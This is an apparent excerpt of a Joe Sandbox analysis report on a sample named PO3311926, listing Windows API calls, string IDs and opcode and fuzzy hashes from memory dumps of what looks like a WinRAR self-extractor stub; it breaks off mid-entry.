                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: rtmp%d
                                                                                              • API String ID: 3726343395-3303766350
                                                                                              • Opcode ID: dec52ba80f33f8bc319e9aea894002a0c25bbfd1d472687d814c84ea8411542d
                                                                                              • Instruction ID: 7689e8250d44b21e914af7fcc0ba05d30b56eddad2829bbd8e5b30e94868d237
                                                                                              • Opcode Fuzzy Hash: dec52ba80f33f8bc319e9aea894002a0c25bbfd1d472687d814c84ea8411542d
                                                                                              • Instruction Fuzzy Hash: 5C41667190425866DF21AB60CC56EEE73FCEF56740F0048E5B649E3151EF748B89DB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __aulldiv.LIBCMT ref: 00BB122E
                                                                                                • Part of subcall function 00BAB146: GetVersionExW.KERNEL32(?), ref: 00BAB16B
                                                                                              • FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00BB1251
                                                                                              • FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00BB1263
                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00BB1274
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BB1284
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BB1294
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00BB12CF
                                                                                              • __aullrem.LIBCMT ref: 00BB1379
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                                                                              • String ID:
                                                                                              • API String ID: 1247370737-0
                                                                                              • Opcode ID: 62f80025f2c2cbaff42f1934d16eb3a618fc03b78168d1f2c13ff18e5690bede
                                                                                              • Instruction ID: 9dc21c0c6d110dcf8a53171731cef41555ac7754a9a6f09adf85b1ecadaffa06
                                                                                              • Opcode Fuzzy Hash: 62f80025f2c2cbaff42f1934d16eb3a618fc03b78168d1f2c13ff18e5690bede
                                                                                              • Instruction Fuzzy Hash: 914116B1508306AFC710DF69C8849ABFBE9FB88714F408D2EF596D2210E774E649CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00BA2536
                                                                                                • Part of subcall function 00BA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BA40A5
                                                                                                • Part of subcall function 00BB05DA: _wcslen.LIBCMT ref: 00BB05E0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: __vswprintf_c_l_swprintf_wcslen
                                                                                              • String ID: ;%u$x%u$xc%u
                                                                                              • API String ID: 3053425827-2277559157
                                                                                              • Opcode ID: 4e1ba2ce7f0ac97490964e2fc3ab47360c626391c37616ec9fe1b9b8ec857f57
                                                                                              • Instruction ID: b9d5457d174da1615b30a1cfee34701c22e7e618db9f5426f3d344f47b43be8d
                                                                                              • Opcode Fuzzy Hash: 4e1ba2ce7f0ac97490964e2fc3ab47360c626391c37616ec9fe1b9b8ec857f57
                                                                                              • Instruction Fuzzy Hash: 1BF1277060C3409BCF25DB2C8595BFE7BD5AF92300F0845EDFD869B283DB64994987A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: </p>$</style>$<br>$<style>$>
                                                                                              • API String ID: 176396367-3568243669
                                                                                              • Opcode ID: b6e35a17a5bccd1475f6116bc79360b0d0cffca711bbfabc518c9b62fac97509
                                                                                              • Instruction ID: 1cc1eb71cf02c2078eb382c62522c058f756ca16c990e207b22dd3452d452fe0
                                                                                              • Opcode Fuzzy Hash: b6e35a17a5bccd1475f6116bc79360b0d0cffca711bbfabc518c9b62fac97509
                                                                                              • Instruction Fuzzy Hash: 2251F85674032397DB349A2A98117F673E0DFA1750F6944AAFBC1CB2C0FBE5CC458261
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00BCFE02,00000000,00000000,00000000,00000000,00000000,00BC529F), ref: 00BCF6CF
                                                                                              • __fassign.LIBCMT ref: 00BCF74A
                                                                                              • __fassign.LIBCMT ref: 00BCF765
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00BCF78B
                                                                                              • WriteFile.KERNEL32(?,00000000,00000000,00BCFE02,00000000,?,?,?,?,?,?,?,?,?,00BCFE02,00000000), ref: 00BCF7AA
                                                                                              • WriteFile.KERNEL32(?,00000000,00000001,00BCFE02,00000000,?,?,?,?,?,?,?,?,?,00BCFE02,00000000), ref: 00BCF7E3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 1324828854-0
                                                                                              • Opcode ID: 2352e0ec6a88d0c7d76bee7d05baf034085c52c343a66399be61163757f935da
                                                                                              • Instruction ID: 28e97ceafe97ca54f92101f7e53956a4790c0fddba43b32d471b7115cf359f35
                                                                                              • Opcode Fuzzy Hash: 2352e0ec6a88d0c7d76bee7d05baf034085c52c343a66399be61163757f935da
                                                                                              • Instruction Fuzzy Hash: C55192B190024A9FDB10CFA8DC85FEEBBF5EF09310F1441AEE555E7251E630AA40CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00BC2937
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 00BC293F
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00BC29C8
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00BC29F3
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 00BC2A48
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 1170836740-1018135373
                                                                                              • Opcode ID: 597a81ecca61fcf05c8c9d0517f437835a8b36ab2b967098e3496c02c4c8be7a
                                                                                              • Instruction ID: 18390740d05dd0fd6ec2240a1bf019b640073df49e511123882a225ac6ae53d8
                                                                                              • Opcode Fuzzy Hash: 597a81ecca61fcf05c8c9d0517f437835a8b36ab2b967098e3496c02c4c8be7a
                                                                                              • Instruction Fuzzy Hash: FF418434A002089FCF10DF68C885F9EBBE5EF44314F1480AAE8195B392D7719A55CB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00BB9EEE
                                                                                              • GetWindowRect.USER32(?,00000000), ref: 00BB9F44
                                                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00BB9FDB
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 00BB9FE3
                                                                                              • ShowWindow.USER32(00000000,00000005), ref: 00BB9FF9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$RectText
                                                                                              • String ID: RarHtmlClassName
                                                                                              • API String ID: 3937224194-1658105358
                                                                                              • Opcode ID: 32efff99421b56e25cf3dbc44438f580d2b8a1345ed6868a0e0fe551c6651fb0
                                                                                              • Instruction ID: 6bebe29c595b15c2e2ab9990a3cddf57e0f8b0c547b39c56e1b297f33468e1dd
                                                                                              • Opcode Fuzzy Hash: 32efff99421b56e25cf3dbc44438f580d2b8a1345ed6868a0e0fe551c6651fb0
                                                                                              • Instruction Fuzzy Hash: A041BF31508214EFDB216F649C48BBFBFECEF48711F008599F949AA156CB74E904CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen
                                                                                              • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                              • API String ID: 176396367-3743748572
                                                                                              • Opcode ID: caaa65395c90fbaf0e422ffab1138d0c91e166b752f3af635e539cadc1ebe0b2
                                                                                              • Instruction ID: b11e8305649fcab9ea4de945e6648bcefd55bdaff81209abdc52bb59ce3d0c20
                                                                                              • Opcode Fuzzy Hash: caaa65395c90fbaf0e422ffab1138d0c91e166b752f3af635e539cadc1ebe0b2
                                                                                              • Instruction Fuzzy Hash: F6313E3264434597D634AB549C42FFAB3E4EB50720F50849FFA96572C0FBE0AD4183A1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00BCC868: _free.LIBCMT ref: 00BCC891
                                                                                              • _free.LIBCMT ref: 00BCC8F2
                                                                                                • Part of subcall function 00BC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?), ref: 00BC8DE2
                                                                                                • Part of subcall function 00BC8DCC: GetLastError.KERNEL32(?,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?,?), ref: 00BC8DF4
                                                                                              • _free.LIBCMT ref: 00BCC8FD
                                                                                              • _free.LIBCMT ref: 00BCC908
                                                                                              • _free.LIBCMT ref: 00BCC95C
                                                                                              • _free.LIBCMT ref: 00BCC967
                                                                                              • _free.LIBCMT ref: 00BCC972
                                                                                              • _free.LIBCMT ref: 00BCC97D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                              • Instruction ID: 9d486d0f5b41738b579729d47c04b0f1907a91bc102fe6fcb7ffed4c3619bb06
                                                                                              • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                                              • Instruction Fuzzy Hash: 0A110A71580B04AAE621BBB1DC07FDB7BFCAF24B00F804C6DF2DEA6092DA65A5058750
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00BBE669,00BBE5CC,00BBE86D), ref: 00BBE605
                                                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00BBE61B
                                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00BBE630
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                              • API String ID: 667068680-1718035505
                                                                                              • Opcode ID: a8e5bee8c9be4193a1115a838a8c81d78c9c5225683e5d5e2819db05b76b2535
                                                                                              • Instruction ID: 51950023a947c6373e20b6d0fd5dd755e4cc992fa74c40e0f44eea2b2b4d094f
                                                                                              • Opcode Fuzzy Hash: a8e5bee8c9be4193a1115a838a8c81d78c9c5225683e5d5e2819db05b76b2535
                                                                                              • Instruction Fuzzy Hash: C8F0C2317912225B5F224F649C947FAB3C8AE3574531904FAED23D3270FB90CC50AA91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00BC891E
                                                                                                • Part of subcall function 00BC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?), ref: 00BC8DE2
                                                                                                • Part of subcall function 00BC8DCC: GetLastError.KERNEL32(?,?,00BCC896,?,00000000,?,00000000,?,00BCC8BD,?,00000007,?,?,00BCCCBA,?,?), ref: 00BC8DF4
                                                                                              • _free.LIBCMT ref: 00BC8930
                                                                                              • _free.LIBCMT ref: 00BC8943
                                                                                              • _free.LIBCMT ref: 00BC8954
                                                                                              • _free.LIBCMT ref: 00BC8965
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID: 0"V
                                                                                              • API String ID: 776569668-4270886499
                                                                                              • Opcode ID: baac62cfd3ef62ec0a06feb41f2eeaa74acde637ef5515d1fd784468449002ce
                                                                                              • Instruction ID: 5319d94c445ae84746b2b9c2097b933a4497d2e8cbac7bbdb3b6e72cccdf84ee
                                                                                              • Opcode Fuzzy Hash: baac62cfd3ef62ec0a06feb41f2eeaa74acde637ef5515d1fd784468449002ce
                                                                                              • Instruction Fuzzy Hash: D2F03A758121228BCA467F18FC06B0D7BE1F72472030305AEF0655B2B1DF728941DB81
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BB14C2
                                                                                                • Part of subcall function 00BAB146: GetVersionExW.KERNEL32(?), ref: 00BAB16B
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00BB14E6
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BB1500
                                                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00BB1513
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BB1523
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00BB1533
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                              • String ID:
                                                                                              • API String ID: 2092733347-0
                                                                                              • Opcode ID: 572629b26729f5acd6adf267b75285b72339a413b75c08c3b0e75f4ed923bca2
                                                                                              • Instruction ID: 6439a4b58fde64ff9595d9123ee9af9019be653b17bc9fe1b727744ea06d0f23
                                                                                              • Opcode Fuzzy Hash: 572629b26729f5acd6adf267b75285b72339a413b75c08c3b0e75f4ed923bca2
                                                                                              • Instruction Fuzzy Hash: B931F875108306ABC704DFA8C89599BB7F8FF98714F404A2EF999D3210E730D509CBA6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00BC2AF1,00BC02FC,00BBFA34), ref: 00BC2B08
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BC2B16
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BC2B2F
                                                                                              • SetLastError.KERNEL32(00000000,00BC2AF1,00BC02FC,00BBFA34), ref: 00BC2B81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: f948567346abfb98ecf7205d813f21836d769a6e31ed02a37a23b73212c5e631
                                                                                              • Instruction ID: d976b7b80473f375e9f43db84d56c373ec51d8450b238c4cf2ba4f3d35e8b242
                                                                                              • Opcode Fuzzy Hash: f948567346abfb98ecf7205d813f21836d769a6e31ed02a37a23b73212c5e631
                                                                                              • Instruction Fuzzy Hash: BF01D43210A712AEE6542B747C95F2A6BD9EB01F747A047BEF1245A0E1FF118C009254
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,00BE1098,00BC4674,00BE1098,?,?,00BC40EF,?,?,00BE1098), ref: 00BC97E9
                                                                                              • _free.LIBCMT ref: 00BC981C
                                                                                              • _free.LIBCMT ref: 00BC9844
                                                                                              • SetLastError.KERNEL32(00000000,?,00BE1098), ref: 00BC9851
                                                                                              • SetLastError.KERNEL32(00000000,?,00BE1098), ref: 00BC985D
                                                                                              • _abort.LIBCMT ref: 00BC9863
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1535475032.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1535452848.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535566202.0000000000BD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BDE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000BE5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535587776.0000000000C02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1535665868.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_ba0000_PO3311926.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              • Opcode ID: c832522fcfa827e638db54d4cb073594dd29f906122c4957e827083841a67f0d
